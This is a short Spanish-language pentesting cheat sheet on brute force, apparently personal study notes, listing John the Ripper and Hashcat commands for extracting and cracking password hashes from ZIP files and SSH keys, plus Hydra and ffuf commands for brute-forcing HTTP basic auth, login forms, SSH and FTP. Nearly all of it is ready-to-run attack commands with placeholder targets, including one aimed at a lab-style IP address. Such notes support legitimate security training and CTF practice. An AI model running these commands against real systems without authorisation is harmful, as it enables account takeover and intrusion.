Fuerza Bruta

John The Ripper
Sacar hash de .zip encriptado
zip2john $ZIP > $OUTPUT
Convertir clave SSH a formato John
/usr/share/john/ssh2john.py $FILE > $OUTPUT 
Crackear Hash
# Sin especificar el formato
john --wordlist=$WORDLIST $FILE_TO_CRACK
Mostar la password crackeada
# Si ya has crackeado previamente la pass
john --show $FILE
Hashcat
Tipos y códigos de Hashes
https://hashcat.net/wiki/doku.php?id=example_hashes
Ataque simple de wordlist
hashcat -m $HASH_TYPE $HASH_FILE $WORDLIST
Hydra
# Basic Auth Brute Force - Combined Wordlist
hydra -C $WORDLIST $RHOST -s $RPORT http-get /	
​
# Basic Auth Brute Force - User/Pass Wordlists
hydra -L $USER_WORDLIST -P $PASS_WORDLIST -u -f $RHOST -s $RPORT http-get /
​
# Login Post-Form Brute Force - Static User, Pass Wordlist
hydra -l $USER -P $PASS_WORDLIST -f $RHOST -s $RPORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
​
# SSH Brute Force - User/Pass Wordlists
hydra -L $USER_WORDLIST -P $PASS_WORDLIST -u -f ssh://$RHOST:$RPORT -t 4
​
# FTP Brute Force - Static User, Pass Wordlist
hydra -l $USER -P $PASS_WORDLIST ftp://$RHOST
​
# Switchs
-f # Stops on the first successful
-u # Tries all users on each password
-t 4 # Max number of parallel attemps 
-I # Saltar espera entre sesiones previas
​
# List types of requests
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
​
# Listar 'post-form' template
hydra http-post-form -U
/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:[FAIL/SUCCESS]=[success/failed string]
Ffuf
# POST LOGIN (VARIAS WORDLISTS)
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.164.235/customers/login -fc 200

Última actualización 1yr ago